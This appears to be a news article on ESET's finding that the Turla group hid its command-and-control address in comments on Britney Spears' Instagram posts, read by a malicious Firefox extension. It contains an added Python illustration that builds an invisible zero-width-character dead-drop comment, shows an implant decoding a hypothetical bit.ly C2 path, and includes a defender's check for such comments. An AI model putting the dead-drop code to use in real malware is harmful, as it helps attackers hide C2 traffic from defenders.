A Russian-linked hacking group has been caught using the comments on Britney Spears’ Instagram account to pass the address of its command and control server to infected computers.
The group has been posting encoded comments on Britney Spears’ Instagram posts, betting that traffic to a hugely popular social network blends in with ordinary browsing and escapes the notice of defenders.
Researchers at security firm ESET have published an analysis of how the group communicates through the Instagram account, which has more than 16 million followers. They attribute the activity to Turla, a hacker group linked to Russia that has been refining this technique over roughly the last three years.
Turla’s watering hole technique serves a malicious Firefox extension to visitors of a compromised website. Once installed, the extension connects the victim’s browser to the group’s command and control server, which can then push further malware or take remote control of the machine. Turla is known for targeting computers belonging to embassies, governments, government officials and diplomats.
“The extension uses a bit.ly URL to reach its C&C, but the URL path is nowhere to be found in the extension code. In fact, it will obtain this path by using comments posted on a specific Instagram post. The one that was used in the analyzed sample was a comment about a photo posted to the Britney Spears official Instagram account,” said researchers at ESET.
The researchers noted that the attackers recently posted a comment on one of Britney Spears’ Instagram photos. The comment reads like ordinary fan chatter, but the extension computes a custom hash over every comment on that post and compares it with a value hard-coded into the extension; the comment whose hash matches is the one carrying the encoded path of the shortened link to Turla’s C&C server. Because the infected browser simply fetches the comments of a specific post on a public account, the C&C lookup is indistinguishable from a normal visit to Instagram, and the attackers can change the destination at any time by posting a new comment.
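The comment-based lookup described above, as an added illustration that is not part of the original article or of ESET’s analysis. The hash function (FNV-1a), the zero-width-joiner marking scheme, the cover text and the bit.ly path are all assumptions chosen for this example; the real extension’s hash and encoding are not reproduced here. The block builds a dead-drop comment whose visible text is unchanged, shows how an implant would pick it out of a thread and recover the link path, and ends with the check a defender can run over the same comments.

```python
import re
from typing import List, Optional

# Zero-width code points: invisible when rendered, but preserved in the text.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}
ZWJ = "\u200d"  # zero-width joiner, used here as the marker


def custom_hash(text: str) -> int:
    """Stand-in for the extension's 'custom hash' (assumption: the real
    function is not documented on this page). 32-bit FNV-1a over UTF-8."""
    h = 0x811C9DC5
    for b in text.encode("utf-8"):
        h ^= b
        h = (h * 0x01000193) & 0xFFFFFFFF
    return h


def make_dead_drop(cover: str, path: str) -> str:
    """Attacker side: mark each character of the link path with a ZWJ
    placed directly before its next occurrence in the cover text. The
    rendered comment is identical to the cover; only the markers are added."""
    out, pos = [], 0
    for ch in path:
        idx = cover.find(ch, pos)
        if idx < 0:
            raise ValueError(f"cover text lacks {ch!r} after position {pos}")
        out.append(cover[pos:idx] + ZWJ)
        pos = idx
    out.append(cover[pos:])
    return "".join(out)


# Implant side: the hidden path is the sequence of word characters that
# immediately follow a ZWJ.
HIDDEN = re.compile(r"\u200d(\w)")


def extract_path(comment: str) -> str:
    return "".join(HIDDEN.findall(comment))


def resolve_c2(comments: List[str], expected_hash: int) -> Optional[str]:
    """Walk the comments in order; the first one whose hash equals the
    hard-coded value and that yields a non-empty path is the dead drop."""
    for c in comments:
        if custom_hash(c) != expected_hash:
            continue
        path = extract_path(c)
        if path:
            return "https://bit.ly/" + path
    return None


def flag_zero_width(comments: List[str]) -> List[int]:
    """Defender side: a comment that renders as plain text but contains
    zero-width code points deserves a look, whatever its hash."""
    return [i for i, c in enumerate(comments) if any(ch in ZERO_WIDTH for ch in c)]


# Constructed sample thread (not the real comments). Comment 2 is the dead
# drop; the others are decoys.
C2_PATH = "3aBcDeF"  # hypothetical bit.ly path
COVER = "#3hot pic a Beautiful song cant stop Dancing to the beat Fave"
DEAD_DROP = make_dead_drop(COVER, C2_PATH)
SAMPLE_COMMENTS = [
    "stunning as always!!",
    "#queen #icon",
    DEAD_DROP,
    "need that outfit",
]
# The attacker ships this number inside the extension instead of the URL.
EXPECTED_HASH = custom_hash(DEAD_DROP)

if __name__ == "__main__":
    print(repr(DEAD_DROP))  # the markers are only visible in the repr
    print(resolve_c2(SAMPLE_COMMENTS, EXPECTED_HASH))
    print(flag_zero_width(SAMPLE_COMMENTS))
```

Note that `DEAD_DROP.replace(ZWJ, "")` is exactly `COVER`: the moderation view and the casual reader see nothing unusual, while the implant needs only the hash to know which comment to decode. Changing the C&C means posting a fresh comment and shipping a new hash; the old comment can be deleted without leaving an obvious URL behind.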
“The fact that the Turla actors are using social media as a way to obtain its C&C servers is quite interesting. This behavior has already been observed in the past by other threat crews such as the Dukes. Attackers using social media to recover a C&C address are making life harder for defenders,” the researchers said.
“Firstly, it is difficult to distinguish malicious traffic to social media from legitimate traffic. Secondly, it gives the attackers more flexibility when it comes to changing the C&C address as well as erasing all traces of it. It is also interesting to see that they are recycling an old way of fingerprinting a victim and finding new ways to make the C&C retrieval a bit more difficult.”